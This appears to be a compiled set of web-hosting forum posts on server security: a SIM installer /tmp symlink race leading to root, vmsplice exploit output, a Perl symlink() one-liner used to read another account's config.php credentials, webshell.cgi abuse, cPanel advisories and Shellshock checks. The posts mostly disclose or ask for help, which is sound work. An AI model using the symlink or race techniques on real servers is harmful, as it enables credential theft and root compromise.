SIM Installer Symlink Attack + Race Condition Local Root Vulnerability
Apr 29, 2007
Code:
$ md5sum sim-current.tar.gz
6c1cece6f3af87598c4bdb09cabcb3cc sim-current.tar.gz
Line 25, file: sim-2.5-3/setup
Code:
TMPS="/tmp/sim_cj"
Line 399, file sim-2.5-3/install/sim
Code:
cat $TMPS >> /etc/crontab
If a local user creates a symlink to that file, then writes to the sim_cj file being linked to, as SIM is being installed, they can influence the contents of /etc/crontab.
Contacted the vendor via email on 04/17/07, email bounced.
Opened a ticket via their helpdesk ~5 days ago, no response.
Again, this is only an issue during the install, which is an extremely small window of time. Any bug that could lead to root access should be fixed, however.
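Added example (not part of the original post and not SIM's own code): a hardened form of the staging step quoted above, which builds the cron entries in a private `mktemp -d` directory and refuses symlinks or foreign-owned files before appending. The function names, the `cron_entries` file name and the target parameter are assumptions for illustration.

```shell
#!/bin/sh
# Added example: hardened replacement for "write /tmp/sim_cj, then cat it into
# the crontab". Function names and the cron_entries file name are hypothetical.

# is_safe_stage FILE
# Succeeds only if FILE is a regular file, is not a symlink, and is owned by
# the user running the installer. A pre-existing /tmp/sim_cj planted by
# another local user fails at least one of these checks.
is_safe_stage() {
    f=$1
    if [ -L "$f" ]; then return 1; fi      # symlink: target is not ours to trust
    if [ ! -f "$f" ]; then return 1; fi    # missing, directory, FIFO, device...
    if [ ! -O "$f" ]; then return 1; fi    # owned by a different user
    return 0
}

# append_cron_entries TARGET ENTRY...
# Stages the entries in a directory only the caller can enter (mode 0700,
# unpredictable name), verifies the staged file, then appends it to TARGET.
# TARGET is a parameter so the routine can be exercised on a scratch file.
append_cron_entries() {
    target=$1
    shift
    old_umask=$(umask)
    umask 077
    stage_dir=$(mktemp -d "${TMPDIR:-/tmp}/sim_cj.XXXXXX") || {
        umask "$old_umask"; return 1
    }
    stage="$stage_dir/cron_entries"
    rc=1
    # set -C (noclobber) makes the redirection fail if the file already exists.
    if ( set -C; printf '%s\n' "$@" > "$stage" ) && is_safe_stage "$stage"; then
        cat "$stage" >> "$target" && rc=0
    fi
    rm -rf "$stage_dir"
    umask "$old_umask"
    return "$rc"
}
```

The private directory closes the window the post describes: no other local user can create or replace a name inside it between the write and the `cat`.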
Oct 30, 2009
I'm planning a website at the moment but I'm wondering about a slight issue, regarding the local root folder of a website.
Currently, I'm using Dreamweaver to create a website and I have had no problems uploading my files to a site through Dreamweaver before. But I will not have access to my computer for about one month every year. However, I have a laptop available during that month. But since my local root folder is located on my stationary computer it seems impossible for me to, in any way, use that laptop to manage my site (upload new files to the server).
Feb 10, 2008
Get ready for another round of patching and reboots. See:
[url]
Linux vmsplice Local Root Exploit
By qaaz
Linux 2.6.17 - 2.6.24.1
Debian also has a report but I'm trying to avoid linking to the source of the exploit. It works on 2.6.24, but only once. Then the box kernel panics (did for me). 2.6.24.1 is out as of a couple of days ago, but I'm not sure if it's still vulnerable. Seems like it is.
luki@tester:/tmp$ gcc t.c -o t
luki@tester:/tmp$ ./t
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e6f000 .. 0xb7ea1000
[+] root
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@tester:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tester:/tmp#
Sep 22, 2007
On one of my root servers a DDoS attack is running, apparently from a botnet; however, all requests have the same Referer. Who can give me tips on how I can prevent the attacks? Preferably just stop them via the Referer?
Mar 11, 2015
I am looking for a way to put a rewrite condition into my configuration where I can poll an external web page and based on the http status code, allow the rewrite or not.
I am doing this in order to set a maintenance status on two different proxy servers, one is apache the other is a big-ip. I already have the maintenance pages and control setup on the big-ip, but I need a way to poll a url and pull a specific http status code served up by the big-ip.
Aug 21, 2006
malware acl condition: clamd: connection to 127.0.0.1, port 3310 failed (Bad file descriptor)
This is a normal Cpanel FC3 exim/clamav server.
Has anyone come across this annoying yet little error?
Aug 15, 2008
I have a big problem: all forums on my server were hacked by a Perl symlink (they see all config.php files through a Perl shell, as .txt, by include).
I solved it by setting the perl permissions to 000, but everything in cPanel stopped, because cPanel runs on Perl.
Jun 28, 2007
I'm trying to create a symlink (ln -s) in SSH with the goal of having a php-file to be able to be reached from my wildcard subdomains "username.domain.com". The reason is because of XMLHttpRequest that resides in the php-file. When trying to access it from username.domain.com I only get an error, because of the cross-domain issue.
Anyway, I got the suggestion of creating a symlink on the file system, but I can't really get the symlink right... Where should I place it on the file system?
This is the path to the script;
Code:
/home/web2753/domains/domain.com/public_html/ajax/status.php
I tried creating the symlink in various places, like in the /domains/ directory;
Code:
ln -s /home/web2753/domains/domain.com/public_html/ajax/status.php
But I don't seem to get it right! If I have understood everything correctly, I'm supposed to create a symlink for status.php so the Subdomains can access it as if it was placed directly under the subdomains.
This is what my .JS file looks like (with the XMLhttprequest, this might not matter..?)
Code:
/home/web2753/domains/domain.com/public_html/javascript/edit.js
Code:
var cururl = 'htp domain com'; // this forum didn't like this url?
function createRequestObject() {
    var req;
    if (window.XMLHttpRequest) {
        req = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        req = new ActiveXObject("Microsoft.XMLHTTP");
    } else {
        alert('Problem creating the XMLHttpRequest object');
    }
    return req;
}
function handleDivTag(divtag) {
    var divtag;
    return divtag;
}
var http = createRequestObject();
var divhandler = new handleDivTag(null);
function sendRequest(ua_id,show,series) {
    http.open('get', cururl+'ajax/status.php?ua_id='+ua_id+'&show='+show+'&series='+series+'&dummy=' + new Date().getTime());
    http.onreadystatechange = handleResponseTwo;
    divhandler.divtag = ua_id;
    http.send(null);
}
function handleResponseTwo() {
    if (http.readyState == 4 && http.status == 200) {
        var response = http.responseText;
        if (response) {
            document.getElementById('editinfo'+divhandler.divtag).innerHTML = response;
        }
    }
}
Everything works except for the cross-domain issue which I'm trying to overcome by creating a symlink.
Jul 5, 2009
I’ve been working on a project for weeks and I can not solve this, hope you can give me an idea. I am working on a dedicated server, and I need to create some symlinks between different accounts and users...
Both accounts are on the same partition of the server (home) and I have root access and SSH access for everything.
If I create a symlink to a directory of another account and on that directory there is any HTML file (e.g. Index.html), that symlink works great and it shows the content on that file.
HOWEVER if the symlink targets to a directory in which there is a file in (e.g. Index.php) or any script programmed in PHP (e.g. Joomla) it does not work and gives...
“Internal Server Error” + Additionally, a 404 Not Found error was encountered...
When I go to Cpanel the “error log” says...
[Sun Jul 05 09:15] [error] [client zz] File does not exist: /home/zzz/public_html/ 500 shtml
[Sun Jul 05 09:15] [error] [client zz] SoftException in Application.cpp:367: Mismatch between target UID (123) and UID (123) of file "/home/zzz/public_html/my-dir/my-symlink/ index php"
However, if I go to SSH and edit the server owner of the symlink, so both symlink and target file have the same owner (chown user:user directory_name) the problem is the same, but on the “error log” the UID Mismatch disappears and I only find...
File does not exist: /home/zzz/public_html/500 shtml
I’ve also tried modifying suexec by changing... “domain . tld ” for “domain - tld ” on the server alias, and does not work.
Here I give you more info about server file structure...
serveralias generation path...
/var/cpanel/userdata/USER/DOMAIN
suexec location...
/usr/local/apache/sbin/suexec
Server Information
System Linux
Apache Version 2.2.11 (Unix)
PERL Version 5.8.8
PHP Version 5.2.8
So the question is... HOW can I create a symlink between different users on the same dedicated server partition, that target to PHP scripts or how can I allow the server to execute PHP scripts through symlinks of different accounts?
Jun 29, 2008
A client hacked another client of mine using the following Perl code:
#!/usr/bin/perl
symlink ("/home/john/public_html/config.php","/home/carole/public_html/forums/includes/config.php");
After the hacker got the DB name, username and password it's very easy to change anything in the forum using PHP.
I'm using cPanel.
May 12, 2015
I installed Apache2. In the folder "var/www/html" I created a symlink to a different HDD that holds a number of movie files. My thinking is that it would be easy to access the movies through a browser from any computer on my local network.
I used the following command string while in the html directory, and created the symlink:
ln -sd /media/guy/movie1/Movies test
While sitting at the server, when I click on "test" it opens the correct directory and exposes the files. If I surf to apache from another machine it does not show the symlink.
Here are the permissions on the symlink:
lrwxrwxrwx 1 root root 24 May 11 19:56 test -> /media/guy/movie1/Movies
Excerpt from Apache access log:
192.168.1.158 - - [12/May/2015:08:40:07 -0400] "GET /favicon.ico HTTP/1.1" 404 502 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:40:07 -0400] "GET /favicon.ico HTTP/1.1" 404 502 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:40:07 -0400] "GET /favicon.ico HTTP/1.1" 404 502 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:50:38 -0400] "GET / HTTP/1.1" 200 584 "-" "Mozilla/5.0 (X11; Linux i686; rv:24.7) Gecko/20140802 Firefox/24.7 PaleMoon/24.7.1"
192.168.1.158 - - [12/May/2015:08:50:39 -0400] "GET /icons/blank.gif HTTP/1.1" 304
Nov 18, 2008
This security flaw came to light at the end of October and I didn't find it posted already so thought it worth mentioning having tested the helpdesks for some sites that we use and found them to be at risk.
Details and a demo exploit URL can be found at [url]
For anyone who doesn't know, XSS flaws that allow execution of arbitrary javascript can be exploited easily and without user knowledge to obtain information such as login details or session IDs. This could happen in various ways, including visiting an unrelated page with a simple URL that redirects to the vulnerable URL and then back again. Tools such as NoScript for Firefox may help protect against this on the client side.
Jan 14, 2007
A user is able to use WebShell.cgi:
[url removed]
In order to run commands from the /scripts folder. This is especially dangerous as a user can give an account reseller privilege with full root access.
Because webshell.cgi is running with the uid/gid of apache, it can access all files which can be accessed with apache. And guess what.... the /scripts folder is one of them.
Because it's a CGI script, it doesn't seem as though there is an easy way to block this.
May 13, 2008
I am building a website which requires a data feed from a third party data provider. I have to fill out a 'questionnaire' when submitting my application and I'm not sure what to put for this question.
Question: "Have you run a vulnerability assessment of network security? What is the current assessment rating?"
I Google'd for security rating but came up blank, without any useful result. Is there a level like 1-5 or something for network security rating? I'm not sure what to put on here.
I'm not against getting a shared/virtual hosting account if a host could provide me with these ratings.
Mar 13, 2007
[url]
cPanel Multiple Local File Include Vulnerabilities
Bugtraq ID: 22915
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Mar 11 2007 12:00AM
Updated: Mar 12 2007 04:54PM
Credit: cyb3rt & 020 are credited with the discovery of these vulnerabilities.
Vulnerable: cPanel cPanel 10.9 build 134
cPanel cPanel 10.9 build 125
cPanel cPanel 10.9
May 2, 2008
Just came through on the RSS feeds...
Quote:
Several potential security issues have been identified with cPanel software and Horde, a 3rd party bundled application. cPanel releases prior to 11.18.4 and 11.22.2 are susceptible to security issues, which range in severity from trivial to medium-critical. Along with the discovery of these potential issues, cPanel has released a new security tool to provide users with protection from XSRF attacks.
Quote:
All STABLE and RELEASE users are strongly urged to update to their respective 11.18.5 release. CURRENT and EDGE users should update to the latest 11.22.3 release. No releases are deemed susceptible to severe, critical or root access vulnerabilities.
[url]
May 29, 2007
I'm wondering if this is true:
[url]
Something like:
[url]
Apr 10, 2013
We are currently running ColdFusion 9 on an Apache server. After running a Webinspect scan for one of our web applications, a weak cipher vulnerability was flagged as critical. Their recommended change to the httpd.conf file is listed below. We made the change and restarted our server but the same vulnerability came up again. How to eliminate the weak cipher vulnerability?
SSLCipherSuite ALL:!aNull:!ADH:!eNull:!LOW:!EXP:!NULL:RC4+RSA:+HIGH:+MEDIUM
Jun 27, 2013
I am using Plesk 11.0.9 and I want to disable SSL anonymous authentication. A vulnerability exists in SSL communications when clients are allowed to connect using no authentication algorithm.
How can I disable anonymous authentication?
Plesk Apache + nginx running
Sep 16, 2007
Attacking multicore CPUs
[url]
[url]
"The Register reports that the world of current multi-core central processing units (CPUs) just entered is facing a serious threat. A security researcher at Cambridge disclosed a new class of vulnerabilities that takes advantage of concurrency to bypass security protections such as anti-virus software. The attack is based on the assumption that the software that interacts with the kernel can be used without interference. The researcher, Robert Watson, showed that a carefully written exploit can attack in the little timeframe when this happens, and literally change the "words" that they are exchanging. Even if some of these dark aspects of concurrency were already known, Watson proved that real attacks can be developed, and showed that developers have to fix their code. Fast..."
Oct 1, 2014
We have Plesk Panel 11.5 in Virtuozzo containers (Centos 6 x86_64) and we often provide our customers with ssh access with chroot - /usr/local/psa/bin/chrootsh. We all know about the Shellshock vulnerability and we already installed all fixes to bash, but the chrootsh version is still vulnerable. Here are the results of BashCheck from [URL] ..... under chrooted user:
Vulnerable to CVE-2014-6271 (original shellshock)
Vulnerable to CVE-2014-7169 (taviso bug)
bashcheck: line 15: 19226 Segmentation fault bash -c "true $(printf '<<EOF %.0s' {1..79})" 2> /dev/null
Vulnerable to CVE-2014-7186 (redir_stack bug)
Test for CVE-2014-7187 not reliable without address sanitizer
Variable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug)
Do you plan to release updates for chrootsh?
Jul 18, 2009
I have noticed a cPanel installer bug, where the installer just goes and goes and goes and goes on the Perl install.
root@server [~]# cat /proc/cpuinfo | grep Xeon && cat /proc/cpuinfo | grep MHz
model name : Intel(R) Xeon(R) CPU L5410 @ 2.33GHz
cpu MHz : 2332.664
root@server [~]# free -m
             total       used       free     shared    buffers     cached
Mem:          3034       2263        771          0         96       1933
-/+ buffers/cache:        233       2801
Swap:         2047          0       2047
root@server [~]# ps aux | grep perl | grep -v grep
root 7420 68.7 0.0 13544 1736 pts/0 Rl Jul17 554:26 /usr/bin/expect -- /scripts/expectperlinstaller --force version
root 7422 15.2 0.4 14148 12464 pts/1 Ss+ Jul17 123:17 /usr/bin/perl /scripts/realperlinstaller --force version
root@server [~]# uptime
12:12:58 up 18:29, 3 users, load average: 1.43, 1.42, 1.40
It's been going for 18 hours, still is not done.
I opened a ticket with cPanel and received this:
Quote:
Hiya,
This is a known issue currently, we hope to have a new installer released next week to fix this. This is not a wide-spread issue, and only affects about 2% of our customers. There is a work around for doing this;
1. Install the OS
2. Ensure Perl + CPAN are installed
3. Run CPAN once to configure it ( for those unfamiliar with CPANs options,
accepting the defaults will work for most options ).
Feb 6, 2009
I have seen here in the Windows Hosting Forum that some people ask questions about Windows hosting where they would really benefit from a basic understanding of the Microsoft web technology.
Recently on Jan 21, Microsoft made it a trivial process to install all the components needed to "kick the tires" with the "Web Platform Installer"
And I've come across a lot of hosters claiming to provide Windows hosting that could really use some quality time with this stuff!
From the Microsoft web site:
The Web Platform Installer (Web PI) is a simple tool that installs Microsoft's entire Web Platform, including IIS, Visual Web Developer 2008 Express Edition, SQL Server 2008 Express Edition and the .NET Framework. Using the Web Platform Installer’s user interface, you can choose to install either specific products or the entire Microsoft Web Platform onto your computer. The Web PI also helps keep your products up to date by always offering the latest additions to the Web Platform.
New Updates! Now supporting Windows XP and Windows Server 2003, Web PI makes it easy to install and stay up-to-date with the Microsoft Web Platform. This updated release lets you install ASP.NET MVC, Visual Studio Tools for Silverlight, and much more!
[url]
A nicer screen shot:
[url]
Nov 25, 2008
I have read that although chained root ssl certificates can be more difficult to install they are actually more secure since the root certificate cannot be compromised, only the intermediary.
Is this true? It looks like both google and amazon both use chained SGC certs.
Feb 2, 2007
Has anyone succeeded in using the PHP installer? I tried on a few machines and it just keeps failing.
Mar 17, 2015
Tools & settings > plesk > updates & upgrades.
I tried to open updates & upgrades, with above flow, using the same username and password to log in the panel, on :8443, but the page said the username or password is not valid. attached screenshot....
Apr 11, 2015
I had been wondering why I wasn't getting MU#42 of Plesk 12.0.18 on Ubuntu 14.04.2 LTS (and 12), and I noticed this when running apt-get update (just after running autoinstaller from UI)...
Reading package lists... Done
W: GPG error: http://autoinstall.plesk.com trusty InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 22738D6AF741DEB